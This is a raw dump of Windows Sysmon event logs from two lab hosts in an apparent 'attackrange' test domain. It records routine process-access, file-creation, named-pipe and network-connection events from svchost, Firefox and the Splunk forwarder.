07:58:06.247{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808605Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:06.247{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:06.342{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:06.290{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001051550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:06.290{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001051549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:58:06.290{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.4048.410.173757834C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001051548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:58:06.290{466BC892-5563-60E8-2010-00000000CF01}4048\chrome.4048.410.173757834C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001051554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:07.843{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE1CE47621DF9C1BF5D2634988302A46,SHA256=641C85521DD71B89F603115F511CF03E8281B6E570802F7342987D7779350651,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808613Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:07.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EEBE2C06EF2D8BB7AF14B4C8A2A6030,SHA256=5BC696FEBA1286FF1E332051C8DACC7B39DE15B6DF315B6937D9FE77987D540D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808612Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:07.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=553305B75748855F39A50CF0F006E81A,SHA256=222F05C44E68D3CF6F69BD989D8F06B73AC15C9F03CA67546E141D4EDB4AF379,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808611Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:07.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99EE8A85E19C95BC5B023DCE0EE0400C,SHA256=5D380AB7BA5CD8672E701F2176A5A450374E1D3E35C2625EB48B71C12934329E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808610Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:05.919{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse181.214.206.218-28189-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001051555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:08.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F78D3E0C18A3975E460200E0D9DECCFB,SHA256=F7AAC2CB75316B8CC0BC6D2A304BFC33C425865FE987E4E82A081B9FC4DAA86B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808614Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:08.809{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=283BA790D4A4CC7EF0A8D5C45AAD0833,SHA256=F3B686F51EEC6E5F89FA7563BC574564FB6657C7DB1E18CDDA2E26B3E2099068,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808615Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:09.825{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8819D6821365326D923B5D433D9E9754,SHA256=25763D27E8C0979F0BCB74DC8972EA97DA2E70C7A2A0768ABC30BE34F8901C59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:09.889{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39409DFCD06447886E8199575A756D19,SHA256=95FBEDA8E91A5AABFAE459D48C2AE0F44E5289D3A4CB4A4966D0A16C4D603120,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:00.678{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51107-false10.0.1.12-8000- 23542300x8000000000000000808616Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:10.840{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FF08C544619881AA26ED9FC5BE1B339,SHA256=6DDD3840241D780AAAE9057293BB08B467DA864F8FC30F10A181F103A939B8D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:10.904{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C149BF76FD62EBC413F26590BCB2960,SHA256=AC754878EE34F9096A54CCF988AEBC19BE3310411F1958836BECA9669194DD6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:11.921{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C82A094D148E84CA1B5B7A4EEEB0CCA,SHA256=12BB92A14D20860FEC2A65EB010BB515036826EE0D5828141CF2F463D5C43BFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808617Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:11.840{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B95621E17395880039DF124255F4253C,SHA256=171016CE65DAFBAE23C7D5003CD218C8B07F89EB9F8A5F014B647F3F3CDC5EB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:12.941{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC7D0C86EAD7301D9962C06B296319E,SHA256=7DA4B41D11DCF3EE5838733E4B981E94CCC2B85440B8E3B107975901CC03DC20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808619Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:12.872{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE5B9D6B8E0FDD5947E3A55689EBFF80,SHA256=08B5F6F0F4E67AE0447BD1A2A53C0FC603A25D271DA318B41E216D16FB466275,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808618Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:11.223{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57341-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808620Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:13.903{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E0CD3A7EFD19B143322A98BF06EDE5D,SHA256=EACF2EC656C4360D3E12E165ECA4BEE54E2C57945CC2CF7998AB853741F0538F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:13.971{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93196A9A9E8050A063F1212AE851D808,SHA256=9E92CF6806150F0A98717B58625DDB0384E27F45E8336D23696C6DCE13E2FB73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808621Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:14.915{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F329132AA50C1557BD5092E38AC01F14,SHA256=999B317B24AF1DD5E3D8A76C4956361D5470C8F97B75BE14B60C2D5DB5CC2764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:14.971{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C01B9B350F7C2A9BBE7B07C3994CB70,SHA256=9DFBC7BCD5D477C677CF8B60D8607C7D15C8CF44DF3720DC4F6CCBFE0381A1F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808622Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:15.931{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78E4C463D98F523E60FBD36051B54A81,SHA256=E4A25C9FE927628FB01CCC2F0DE0EF9433F1E39E533BC614E7FC19DB291F366D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.986{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97514EA590D25102667B5A3D4E1849DC,SHA256=FF1410F4D30797AE9BC28126EEE9B12FBAE874DFE1B6822E94A3F250E5D1B091,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
